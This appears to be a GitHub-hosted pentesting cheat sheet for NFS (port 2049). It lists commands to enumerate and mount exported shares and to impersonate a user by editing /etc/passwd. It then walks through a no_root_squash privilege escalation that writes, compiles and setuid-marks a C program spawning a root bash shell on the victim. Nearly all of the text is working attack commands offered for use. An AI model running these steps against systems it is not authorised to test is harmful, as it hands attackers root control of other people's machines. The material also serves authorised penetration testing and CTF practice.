forked from Gimpy42/CheatSheet
-
Notifications
You must be signed in to change notification settings - Fork 2
/
2049
32 lines (27 loc) · 766 Bytes
/
2049
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# NFS - 2049
# Show Mountable NFS Shares
showmount -e <IP>
showmount -a $ip
nmap --script=nfs-showmount -oN mountable_shares <IP>
# Mount a share
sudo mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
sudo mount -v -t nfs -o vers=2 <IP>:<SHARE> <DIRECTORY>
# If no read/write add user to Passwd with proper group
adduser <USER>
nano /etc/passwd
<USER>:x:1016:1016:,,,:/home/pwn:/bin/bash
su <USER>
# NFS misconfigurations
# List exported shares
cat /etc/exports
#! IF no_root_squash/no_all_squash you may be able to privesc.
# Attacker, as root user
mkdir <DIRECTORY>
mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
cd <DIRECTORY>
echo 'int main(void){setreuid(0,0); system("/bin/bash"); return 0;}' > pwn.c
gcc pwn.c -o pwn
chmod +s pwn
# Victim
cd <SHARE>
./pwn # Root shell